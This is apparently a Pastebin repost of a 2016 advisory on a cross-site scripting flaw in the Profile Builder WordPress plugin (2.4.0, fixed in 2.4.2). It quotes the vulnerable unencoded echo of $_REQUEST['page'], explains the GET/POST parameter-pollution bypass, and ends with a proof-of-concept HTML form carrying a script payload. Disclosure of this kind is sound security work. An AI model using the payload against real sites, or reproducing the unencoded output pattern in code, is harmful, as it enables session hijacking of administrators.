API tools faq
paste
Advertisement
Lulz-Tigre

wp_builder plugin css

Lulz-Tigre
Jul 13th, 2016
161
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 5 2.90 KB | None | 0 0
raw download clone embed print report
  1. ------------------------------------------------------------------------
  2. Cross-Site Scripting vulnerability in Profile Builder WordPress Plugin
  3. ------------------------------------------------------------------------
  4. Yorick Koster, July 2016
  5.  
  6. ------------------------------------------------------------------------
  7. Abstract
  8. ------------------------------------------------------------------------
  9. A Cross-Site Scripting vulnerability was found in the Profile Builder
  10. WordPress Plugin. This issue allows an attacker to perform a wide
  11. variety of actions, such as stealing Administrators' session tokens, or
  12. performing arbitrary actions on their behalf. In order to exploit this
  13. issue, the attacker has to lure/force a logged on WordPress
  14. Administrator into opening a malicious website.
  15.  
  16. ------------------------------------------------------------------------
  17. OVE ID
  18. ------------------------------------------------------------------------
  19. OVE-20160712-0014
  20.  
  21. ------------------------------------------------------------------------
  22. Tested versions
  23. ------------------------------------------------------------------------
  24. This issue was successfully tested on Profile Builder - front-end user
  25. registration, user profile and user login WordPress Plugin version
  26. 2.4.0.
  27.  
  28. ------------------------------------------------------------------------
  29. Fix
  30. ------------------------------------------------------------------------
  31. This issue is resolved in Profile Builder version 2.4.2.
  32.  
  33. ------------------------------------------------------------------------
  34. Details
  35. ------------------------------------------------------------------------
  36. https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_profile_builder_wordpress_plugin.html
  37.  
  38. The issue exists in the file class-email-confirmation.php and is caused by the lack of output encoding on the page request parameter. The vulnerable code is listed below.
  39.  
  40. <form id="movies-filter" method="get">
  41.    <!-- For plugins, we also need to ensure that the form posts back to our current page -->
  42.    <input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />
  43.    <!-- Now we can render the completed list table -->
  44.    <?php $listTable->display() ?>
  45. </form>
  46.  
  47. Normally, the page URL parameter is validated by WordPress, which prevents Cross-Site Scripting. However in this case the value of page is obtained from $_REQUEST, not from $_GET. This allows for parameter pollution where the attacker puts a benign page value in the URL and simultaneously submits a malicious page value as POST parameter.
  48. Proof of concept
  49.  
  50. <html>
  51.    <body>
  52.       <form action="http://<target>/wp-admin/users.php?page=unconfirmed_emails" method="POST">
  53.          <input type="hidden" name="page" value=""<script>alert(document.cookie);</script>" />
  54.          <input type="submit" value="Submit request" />
  55.       </form>
  56.    </body>
  57. </html>
  58.  
  59. #  0day.today [2016-07-13]  #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!